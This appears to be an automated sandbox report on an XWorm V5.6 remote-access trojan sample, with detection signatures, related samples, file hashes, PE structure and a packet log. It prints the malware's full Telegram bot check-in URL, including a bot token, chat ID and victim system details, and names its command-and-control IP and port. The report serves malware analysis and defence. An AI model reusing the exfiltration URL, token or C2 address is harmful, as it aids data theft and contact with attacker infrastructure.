                    https://api.telegram.org/bot5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk/sendMessage?chat_id=793028759&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A79B301C4E3529A1CAD54%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20GP23O5%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%2028Nov2024false
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://api.telegram.org/bottE3ZXBTP0B.exefalse
                        high
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nametE3ZXBTP0B.exe, 00000000.00000002.4190665782.0000000003041000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          149.154.167.220
                          api.telegram.orgUnited Kingdom
                          62041TELEGRAMRUfalse
                          89.40.31.232
                          unknownRomania
                          35512TELEMEDIA-ASROtrue
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1562432
                          Start date and time:2024-11-25 15:35:10 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 7m 0s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:5
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:tE3ZXBTP0B.exe
                          renamed because original name is a hash value
                          Original Sample Name:6494baca6b375ea0e325947e94b20c9c3487b03c6ca1fe878c23662d4e547028.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@1/0@1/2
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 6
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • VT rate limit hit for: tE3ZXBTP0B.exe
                          TimeTypeDescription
                          09:36:16API Interceptor12967960x Sleep call for process: tE3ZXBTP0B.exe modified
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          149.154.167.220Pe4905VGl1.batGet hashmaliciousAsyncRATBrowse
                            MSM8C42iAN.exeGet hashmaliciousDarkCloudBrowse
                              November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  wMy37vlfvz.exeGet hashmaliciousDarkCloudBrowse
                                    dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                      denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                        order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                          NEW P.O.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                            MC8017774DOCS.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                              89.40.31.232Dekont#400577_89008_96634.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                              • 89.40.31.232/12/index.php
                                              No. 1349240400713.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                              • 89.40.31.232/12/index.php
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              api.telegram.orgPe4905VGl1.batGet hashmaliciousAsyncRATBrowse
                                              • 149.154.167.220
                                              MSM8C42iAN.exeGet hashmaliciousDarkCloudBrowse
                                              • 149.154.167.220
                                              November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                              • 149.154.167.220
                                              #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              wMy37vlfvz.exeGet hashmaliciousDarkCloudBrowse
                                              • 149.154.167.220
                                              dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                              • 149.154.167.220
                                              NEW P.O.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                              • 149.154.167.220
                                              MC8017774DOCS.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              TELEGRAMRUPe4905VGl1.batGet hashmaliciousAsyncRATBrowse
                                              • 149.154.167.220
                                              MSM8C42iAN.exeGet hashmaliciousDarkCloudBrowse
                                              • 149.154.167.220
                                              November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                              • 149.154.167.220
                                              #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              wMy37vlfvz.exeGet hashmaliciousDarkCloudBrowse
                                              • 149.154.167.220
                                              dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                              • 149.154.167.220
                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                              • 149.154.167.99
                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                              • 149.154.167.99
                                              order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                              • 149.154.167.220
                                              TELEMEDIA-ASRODekont#400577_89008_96634.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                              • 89.40.31.232
                                              No. 1349240400713.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                              • 89.40.31.232
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              3b5074b1b5d032e5620f69f9f700ff0ehttp://begantotireo.xyzGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              Pe4905VGl1.batGet hashmaliciousAsyncRATBrowse
                                              • 149.154.167.220
                                              https://go.dgdp.net/Get hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              http://virtual.urban-orthodontics.comGet hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              LAQfpnQvPQ.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 149.154.167.220
                                              idk_1.ps1Get hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              FreeCs2Skins.ps1Get hashmaliciousUnknownBrowse
                                              • 149.154.167.220
                                              Ref#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                                              • 149.154.167.220
                                              PO#86637.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                              • 149.154.167.220
                                              CHARIKLIA JUNIOR DETAILS (1) (1).pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                              • 149.154.167.220
                                              No context
                                              No created / dropped files found
                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):6.066045079873424
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Windows Screen Saver (13104/52) 0.07%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              File name:tE3ZXBTP0B.exe
                                              File size:76'800 bytes
                                              MD5:acf863dd1a3d9bea3677b677429e6963
                                              SHA1:354c3a0cad99023988521d85cdfefb279cfdbbbc
                                              SHA256:6494baca6b375ea0e325947e94b20c9c3487b03c6ca1fe878c23662d4e547028
                                              SHA512:11d031bf38cc73149f28f910b662f794290f5d67a9c40f2392497afe47f7bc2d57a3893280868271de77e116cf172b95c9434ffcc4dbbab04e6794d3350b29a9
                                              SSDEEP:1536:mj2knMmhKdS08aK+rgYkdQOV9bFejQ4HyLPnqo9OMwPvyif:mQTnDrGdQo9bFxYo9OtVf
                                              TLSH:D2737D2837F60525F1FF6FF519F27222DB36B2236903E35F24C8029A5613A89CD516E6
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Pk.g................."...........A... ...`....@.. ....................................@................................
                                              Icon Hash:90cececece8e8eb0
                                              Entrypoint:0x4141be
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x671F6B50 [Mon Oct 28 10:45:36 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                              Instruction
                                              jmp dword ptr [00232000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1416c0x4f.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x4be.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x180000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000x121c40x12200bcf7537795381bcd86ccb3993af2c113False0.6174434267241379data6.137577330086902IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc0x160000x4be0x600aa6623607586acf6251d7d3eab083948False0.3697916666666667data3.6949593603858335IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x180000xc0x200c85afa9a31cb63780333b2bb0d33c232False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_VERSION0x160a00x234data0.4698581560283688
                                              RT_MANIFEST0x162d40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
                                              DLLImport
                                              mscoree.dll_CorExeMain
                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-11-25T15:36:17.264734+01002853685ETPRO MALWARE Win32/XWorm Checkin via Telegram1192.168.2.449730149.154.167.220443TCP
                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 25, 2024 15:36:14.564848900 CET49730443192.168.2.4149.154.167.220
                                              Nov 25, 2024 15:36:14.564884901 CET44349730149.154.167.220192.168.2.4
                                              Nov 25, 2024 15:36:14.564980984 CET49730443192.168.2.4149.154.167.220
                                              Nov 25, 2024 15:36:15.238092899 CET49730443192.168.2.4149.154.167.220
                                              Nov 25, 2024 15:36:15.238122940 CET44349730149.154.167.220192.168.2.4
                                              Nov 25, 2024 15:36:16.682580948 CET44349730149.154.167.220192.168.2.4
                                              Nov 25, 2024 15:36:16.682734966 CET49730443192.168.2.4149.154.167.220
                                              Nov 25, 2024 15:36:16.687453032 CET49730443192.168.2.4149.154.167.220
                                              Nov 25, 2024 15:36:16.687479973 CET44349730149.154.167.220192.168.2.4
                                              Nov 25, 2024 15:36:16.687776089 CET44349730149.154.167.220192.168.2.4
                                              Nov 25, 2024 15:36:16.731764078 CET49730443192.168.2.4149.154.167.220
                                              Nov 25, 2024 15:36:16.747380018 CET49730443192.168.2.4149.154.167.220
                                              Nov 25, 2024 15:36:16.791327000 CET44349730149.154.167.220192.168.2.4
                                              Nov 25, 2024 15:36:17.264786959 CET44349730149.154.167.220192.168.2.4
                                              Nov 25, 2024 15:36:17.264868975 CET44349730149.154.167.220192.168.2.4
                                              Nov 25, 2024 15:36:17.264933109 CET49730443192.168.2.4149.154.167.220
                                              Nov 25, 2024 15:36:17.277200937 CET49730443192.168.2.4149.154.167.220
                                              Nov 25, 2024 15:36:17.398477077 CET497311717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:36:17.528129101 CET17174973189.40.31.232192.168.2.4
                                              Nov 25, 2024 15:36:17.528243065 CET497311717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:36:17.621371984 CET497311717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:36:17.750083923 CET17174973189.40.31.232192.168.2.4
                                              Nov 25, 2024 15:36:30.533663034 CET497311717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:36:30.662691116 CET17174973189.40.31.232192.168.2.4
                                              Nov 25, 2024 15:36:39.518556118 CET17174973189.40.31.232192.168.2.4
                                              Nov 25, 2024 15:36:39.518800974 CET497311717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:36:40.075855017 CET497311717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:36:40.076877117 CET497381717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:36:40.210308075 CET17174973189.40.31.232192.168.2.4
                                              Nov 25, 2024 15:36:40.210338116 CET17174973889.40.31.232192.168.2.4
                                              Nov 25, 2024 15:36:40.210510969 CET497381717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:36:40.273092031 CET497381717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:36:40.404961109 CET17174973889.40.31.232192.168.2.4
                                              Nov 25, 2024 15:36:51.138482094 CET497381717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:36:51.265723944 CET17174973889.40.31.232192.168.2.4
                                              Nov 25, 2024 15:37:02.013585091 CET497381717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:37:02.188797951 CET17174973889.40.31.232192.168.2.4
                                              Nov 25, 2024 15:37:02.188958883 CET17174973889.40.31.232192.168.2.4
                                              Nov 25, 2024 15:37:02.189066887 CET497381717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:37:02.325666904 CET497381717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:37:02.327860117 CET17174973889.40.31.232192.168.2.4
                                              Nov 25, 2024 15:37:02.460285902 CET17174973889.40.31.232192.168.2.4
                                              Nov 25, 2024 15:37:04.097162962 CET497401717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:37:04.227060080 CET17174974089.40.31.232192.168.2.4
                                              Nov 25, 2024 15:37:04.227158070 CET497401717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:37:04.297550917 CET497401717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:37:04.429264069 CET17174974089.40.31.232192.168.2.4
                                              Nov 25, 2024 15:37:18.247970104 CET497401717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:37:18.378622055 CET17174974089.40.31.232192.168.2.4
                                              Nov 25, 2024 15:37:23.544743061 CET497401717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:37:23.676480055 CET17174974089.40.31.232192.168.2.4
                                              Nov 25, 2024 15:37:26.499550104 CET17174974089.40.31.232192.168.2.4
                                              Nov 25, 2024 15:37:26.499604940 CET497401717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:37:26.526990891 CET17174974089.40.31.232192.168.2.4
                                              Nov 25, 2024 15:37:26.527060986 CET497401717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:37:30.716356993 CET497401717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:37:30.718528032 CET498021717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:37:30.846462965 CET17174974089.40.31.232192.168.2.4
                                              Nov 25, 2024 15:37:30.849338055 CET17174980289.40.31.232192.168.2.4
                                              Nov 25, 2024 15:37:30.849498034 CET498021717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:37:30.878418922 CET498021717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:37:31.002310991 CET17174980289.40.31.232192.168.2.4
                                              Nov 25, 2024 15:37:31.002367020 CET498021717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:37:31.126754999 CET17174980289.40.31.232192.168.2.4
                                              Nov 25, 2024 15:37:31.126852036 CET498021717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:37:31.251806021 CET17174980289.40.31.232192.168.2.4
                                              Nov 25, 2024 15:37:32.575937986 CET498021717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:37:32.700706005 CET17174980289.40.31.232192.168.2.4
                                              Nov 25, 2024 15:37:36.294774055 CET498021717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:37:36.419780016 CET17174980289.40.31.232192.168.2.4
                                              Nov 25, 2024 15:37:41.232218981 CET498021717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:37:41.352688074 CET17174980289.40.31.232192.168.2.4
                                              Nov 25, 2024 15:37:41.352749109 CET498021717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:37:41.473118067 CET17174980289.40.31.232192.168.2.4
                                              Nov 25, 2024 15:37:41.473184109 CET498021717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:37:41.594810963 CET17174980289.40.31.232192.168.2.4
                                              Nov 25, 2024 15:37:51.482342958 CET498021717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:37:51.692791939 CET17174980289.40.31.232192.168.2.4
                                              Nov 25, 2024 15:37:51.692846060 CET498021717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:37:51.817802906 CET17174980289.40.31.232192.168.2.4
                                              Nov 25, 2024 15:37:52.832015038 CET17174980289.40.31.232192.168.2.4
                                              Nov 25, 2024 15:37:52.834178925 CET498021717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:37:56.639334917 CET498021717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:37:56.640933037 CET498581717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:37:56.759891987 CET17174980289.40.31.232192.168.2.4
                                              Nov 25, 2024 15:37:56.761704922 CET17174985889.40.31.232192.168.2.4
                                              Nov 25, 2024 15:37:56.761801004 CET498581717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:37:56.783386946 CET498581717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:37:56.905982018 CET17174985889.40.31.232192.168.2.4
                                              Nov 25, 2024 15:37:59.826061964 CET498581717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:37:59.947568893 CET17174985889.40.31.232192.168.2.4
                                              Nov 25, 2024 15:38:07.170624018 CET498581717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:38:07.317455053 CET17174985889.40.31.232192.168.2.4
                                              Nov 25, 2024 15:38:12.279177904 CET498581717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:38:12.403177023 CET17174985889.40.31.232192.168.2.4
                                              Nov 25, 2024 15:38:12.403238058 CET498581717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:38:12.527143002 CET17174985889.40.31.232192.168.2.4
                                              Nov 25, 2024 15:38:12.527223110 CET498581717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:38:12.650832891 CET17174985889.40.31.232192.168.2.4
                                              Nov 25, 2024 15:38:12.650903940 CET498581717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:38:12.780735970 CET17174985889.40.31.232192.168.2.4
                                              Nov 25, 2024 15:38:18.707847118 CET17174985889.40.31.232192.168.2.4
                                              Nov 25, 2024 15:38:18.708015919 CET498581717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:38:22.654056072 CET498581717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:38:22.656582117 CET499131717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:38:22.776670933 CET17174985889.40.31.232192.168.2.4
                                              Nov 25, 2024 15:38:22.783451080 CET17174991389.40.31.232192.168.2.4
                                              Nov 25, 2024 15:38:22.783519030 CET499131717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:38:22.811214924 CET499131717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:38:22.935795069 CET17174991389.40.31.232192.168.2.4
                                              Nov 25, 2024 15:38:23.060559034 CET499131717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:38:23.181123018 CET17174991389.40.31.232192.168.2.4
                                              Nov 25, 2024 15:38:23.181206942 CET499131717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:38:23.301259995 CET17174991389.40.31.232192.168.2.4
                                              Nov 25, 2024 15:38:28.171348095 CET499131717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:38:28.327498913 CET17174991389.40.31.232192.168.2.4
                                              Nov 25, 2024 15:38:28.327585936 CET499131717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:38:28.447844982 CET17174991389.40.31.232192.168.2.4
                                              Nov 25, 2024 15:38:28.447907925 CET499131717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:38:28.569936991 CET17174991389.40.31.232192.168.2.4
                                              Nov 25, 2024 15:38:31.372901917 CET499131717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:38:31.500042915 CET17174991389.40.31.232192.168.2.4
                                              Nov 25, 2024 15:38:38.591758966 CET499131717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:38:38.711950064 CET17174991389.40.31.232192.168.2.4
                                              Nov 25, 2024 15:38:38.712008953 CET499131717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:38:38.832278013 CET17174991389.40.31.232192.168.2.4
                                              Nov 25, 2024 15:38:38.832381964 CET499131717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:38:38.955873013 CET17174991389.40.31.232192.168.2.4
                                              Nov 25, 2024 15:38:39.732244015 CET499131717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:38:39.852535963 CET17174991389.40.31.232192.168.2.4
                                              Nov 25, 2024 15:38:44.683634043 CET17174991389.40.31.232192.168.2.4
                                              Nov 25, 2024 15:38:44.683757067 CET499131717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:38:49.091639996 CET499131717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:38:49.093862057 CET499691717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:38:49.211589098 CET17174991389.40.31.232192.168.2.4
                                              Nov 25, 2024 15:38:49.213849068 CET17174996989.40.31.232192.168.2.4
                                              Nov 25, 2024 15:38:49.213922024 CET499691717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:38:49.236452103 CET499691717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:38:49.356601000 CET17174996989.40.31.232192.168.2.4
                                              Nov 25, 2024 15:38:49.359453917 CET499691717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:38:49.479415894 CET17174996989.40.31.232192.168.2.4
                                              Nov 25, 2024 15:38:53.029309034 CET499691717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:38:53.150149107 CET17174996989.40.31.232192.168.2.4
                                              Nov 25, 2024 15:38:54.388602972 CET499691717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:38:54.508635044 CET17174996989.40.31.232192.168.2.4
                                              Nov 25, 2024 15:38:54.508691072 CET499691717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:38:54.629296064 CET17174996989.40.31.232192.168.2.4
                                              Nov 25, 2024 15:38:54.629354000 CET499691717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:38:54.749331951 CET17174996989.40.31.232192.168.2.4
                                              Nov 25, 2024 15:39:03.967722893 CET499691717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:39:04.087776899 CET17174996989.40.31.232192.168.2.4
                                              Nov 25, 2024 15:39:05.404603004 CET499691717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:39:05.524914980 CET17174996989.40.31.232192.168.2.4
                                              Nov 25, 2024 15:39:05.779587984 CET499691717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:39:05.900897026 CET17174996989.40.31.232192.168.2.4
                                              Nov 25, 2024 15:39:05.935728073 CET499691717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:39:06.062566042 CET17174996989.40.31.232192.168.2.4
                                              Nov 25, 2024 15:39:11.045108080 CET499691717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:39:11.121413946 CET17174996989.40.31.232192.168.2.4
                                              Nov 25, 2024 15:39:11.121488094 CET499691717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:39:11.121596098 CET499691717192.168.2.489.40.31.232
                                              Nov 25, 2024 15:39:11.123575926 CET500101717192.168.2.489.40.31.232
